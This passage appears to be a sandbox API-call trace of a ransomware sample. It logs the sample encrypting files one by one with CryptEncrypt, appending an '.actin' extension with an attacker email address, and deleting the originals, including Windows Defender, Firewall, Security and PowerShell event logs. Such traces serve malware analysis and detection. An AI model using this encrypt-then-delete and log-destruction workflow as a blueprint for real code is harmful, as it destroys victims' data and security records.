hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0066.364] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e80) returned 1 [0066.364] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.364] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0066.364] CryptDestroyKey (hKey=0xf71e80) returned 1 [0066.364] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0066.364] CryptDestroyKey (hKey=0xf71c80) returned 1 [0066.364] CloseHandle (hObject=0x324) returned 1 [0066.365] CloseHandle (hObject=0x338) returned 1 [0066.366] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx")) returned 1 [0066.368] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0066.368] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0066.368] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0066.368] CloseHandle (hObject=0x338) returned 1 [0066.368] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx")) returned 0x20 [0066.368] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.368] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0066.368] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.368] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.368] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0066.369] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71bc0) returned 1 [0066.369] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.369] ReadFile (in: hFile=0x338, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0066.371] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0066.371] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0066.373] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71d00) returned 1 [0066.373] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.373] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0066.373] CryptDestroyKey (hKey=0xf71d00) returned 1 [0066.373] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0066.373] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0066.373] CloseHandle (hObject=0x338) returned 1 [0066.373] CloseHandle (hObject=0x324) returned 1 [0066.375] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx")) returned 1 [0066.377] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0066.377] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0066.377] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0066.377] CloseHandle (hObject=0x324) returned 1 [0066.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx")) returned 0x20 [0066.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.377] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0066.377] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.377] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.377] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0066.378] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b80) returned 1 [0066.378] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.378] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0066.379] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0066.379] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0066.381] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf72180) returned 1 [0066.381] CryptSetKeyParam (hKey=0xf72180, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.381] CryptEncrypt (in: hKey=0xf72180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xd0, dwBufLen=0xd0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xd0) returned 1 [0066.381] CryptDestroyKey (hKey=0xf72180) returned 1 [0066.381] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x182, lpOverlapped=0x0) returned 1 [0066.381] CryptDestroyKey (hKey=0xf71b80) returned 1 [0066.381] CloseHandle (hObject=0x324) returned 1 [0066.382] CloseHandle (hObject=0x338) returned 1 [0066.383] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx")) returned 1 [0066.385] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0066.385] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0066.546] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=1052672) returned 1 [0066.562] CloseHandle (hObject=0x338) returned 1 [0066.562] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx")) returned 0x20 [0066.562] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.629] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0066.629] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.629] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.629] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0066.630] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71d00) returned 1 [0066.630] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.630] ReadFile (in: hFile=0x338, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x101000, lpOverlapped=0x0) returned 1 [0066.647] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x101010, dwBufLen=0x101010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x101010) returned 1 [0066.648] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x101010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x101010, lpOverlapped=0x0) returned 1 [0066.805] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf720c0) returned 1 [0066.805] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.805] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xc0, dwBufLen=0xc0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xc0) returned 1 [0066.805] CryptDestroyKey (hKey=0xf720c0) returned 1 [0066.805] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x172, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x172, lpOverlapped=0x0) returned 1 [0066.805] CryptDestroyKey (hKey=0xf71d00) returned 1 [0066.805] CloseHandle (hObject=0x338) returned 1 [0066.805] CloseHandle (hObject=0x324) returned 1 [0066.831] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx")) returned 1 [0066.833] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0066.833] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0066.833] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=1118208) returned 1 [0066.833] CloseHandle (hObject=0x324) returned 1 [0066.833] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx")) returned 0x20 [0066.833] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Security.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\security.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.833] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0066.833] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.833] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.833] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Security.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\security.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0066.834] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72040) returned 1 [0066.834] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.834] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x110100, lpOverlapped=0x0) returned 1 [0067.062] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x110100, dwBufLen=0x110100 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x110100) returned 1 [0067.063] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x110100, lpOverlapped=0x0) returned 1 [0067.103] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xf00, lpOverlapped=0x0) returned 1 [0067.103] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xf10, dwBufLen=0xf10 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xf10) returned 1 [0067.103] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf10, lpOverlapped=0x0) returned 1 [0067.103] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71a00) returned 1 [0067.103] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0067.103] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0067.103] CryptDestroyKey (hKey=0xf71a00) returned 1 [0067.103] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0067.104] CryptDestroyKey (hKey=0xf72040) returned 1 [0067.104] CloseHandle (hObject=0x324) returned 1 [0067.104] CloseHandle (hObject=0x338) returned 1 [0067.435] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx")) returned 1 [0067.436] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0067.436] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0067.436] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0067.436] CloseHandle (hObject=0x338) returned 1 [0067.436] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx")) returned 0x20 [0067.436] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\windows powershell.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0067.436] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0067.436] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0067.436] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0067.436] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\windows powershell.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0067.437] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b00) returned 1 [0067.437] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0067.437] ReadFile (in: hFile=0x338, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0067.444] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0067.444] WriteFile (in: hFile=0x334, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0067.446] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71d80) returned 1 [0067.446] CryptSetKeyParam (hKey=0xf71d80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0067.446] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0067.446] CryptDestroyKey (hKey=0xf71d80) returned 1 [0067.446] WriteFile (in: hFile=0x334, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0067.446] CryptDestroyKey (hKey=0xf71b00) returned 1 [0067.446] CloseHandle (hObject=0x338) returned 1 [0067.446] CloseHandle (hObject=0x334) returned 1 [0067.448] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx")) returned 1 [0067.449] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0067.449] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0067.449] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0067.449] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.201] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=15984) returned 1 [0068.201] CloseHandle (hObject=0x324) returned 1 [0068.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb")) returned 0x20 [0068.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.202] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.202] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.202] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) 